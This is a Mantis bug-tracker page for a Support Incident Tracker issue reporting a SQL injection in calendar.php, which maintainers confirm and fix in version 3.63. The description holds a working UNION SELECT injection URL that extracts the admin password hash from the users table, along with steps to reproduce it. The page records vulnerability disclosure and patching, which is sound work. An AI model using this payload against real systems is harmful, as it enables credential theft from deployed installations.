SiT! Bugs

View Issue Details Jump to Notes ] Issue History ] Print ]
IDProjectCategoryView StatusDate SubmittedLast Update
0001395SiT!calendarpublic2010-09-08 15:282011-04-16 15:07
ReporterTomse 
Assigned Topaulh 
PrioritynormalSeveritymajorReproducibilityunable to reproduce
StatusclosedResolutionfixed 
PlatformOSOS Version
Product Version3.62 LTS 
Target Version3.63 LTSFixed in Version3.63 LTS 
Summary0001395: possible SQL injection
Description/calendar.php?display=list&type=1 union all select 1,2,3,4,5,6,7,8,9,10,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from sit_users where id=1;--



I was given this line, it should extract the admin hash, I haven't been able to repro it..
Steps To ReproduceLogin to sit as any user, paste the above URL modified to your system (don't forget the sit_users table)

this will list the user admin with the hashed password value in the users field.

I've been able to reproduce this, both in the 3.62 and SVN
Tagssecurity
Attached Files

- Relationships

-  Notes
User avatar (0003408)
kieran (administrator)
2010-09-11 13:44

Confirmed here.
User avatar (0003426)
ivan (administrator)
2010-10-09 11:24

I can confirm this too
User avatar (0003427)
paulh (administrator)
2010-10-09 11:27

yeap I've managed to repro and have a fix almost ready
User avatar (0003428)
paulh (administrator)
2010-10-09 11:32

r6693 and 58e5772 resolve this

This exploit is only available to authenticated users
User avatar (0003708)
ivan (administrator)
2011-04-16 13:21

http://www.autosectools.com/Advisories/Support.Incident.Tracker.3.62_Reflected.Cross-site.Scripting_132.html [^]
User avatar (0003709)
ivan (administrator)
2011-04-16 13:23

Magpierss issue fixed in r7110 and Git 5d06e50
User avatar (0003714)
ivan (administrator)
2011-04-16 15:07

Fix Released in 3.63

- Issue History
Date Modified Username Field Change
2010-09-08 15:28 Tomse New Issue
2010-09-11 12:33 Tomse Description Updated View Revisions
2010-09-11 12:33 Tomse Steps to Reproduce Updated View Revisions
2010-09-11 12:35 Tomse Description Updated View Revisions
2010-09-11 13:44 kieran Note Added: 0003408
2010-09-11 13:44 kieran Assigned To => kieran
2010-09-11 13:44 kieran Status new => confirmed
2010-10-09 11:16 paulh Status confirmed => assigned
2010-10-09 11:16 paulh Assigned To kieran => paulh
2010-10-09 11:24 ivan Note Added: 0003426
2010-10-09 11:27 paulh Note Added: 0003427
2010-10-09 11:32 paulh Note Added: 0003428
2010-10-09 11:32 paulh Status assigned => resolved
2010-10-09 11:32 paulh Resolution open => fixed
2010-10-09 11:32 paulh Fixed in Version => 3.63 LTS
2010-10-09 11:32 paulh Target Version => 3.63 LTS
2010-10-09 11:32 paulh Tag Attached: security
2011-04-16 13:21 ivan Note Added: 0003708
2011-04-16 13:23 ivan Note Added: 0003709
2011-04-16 13:23 ivan View Status private => public
2011-04-16 15:07 ivan Note Added: 0003714
2011-04-16 15:07 ivan Status resolved => closed


Copyright © 2000 - 2019 MantisBT Team
Powered by Mantis Bugtracker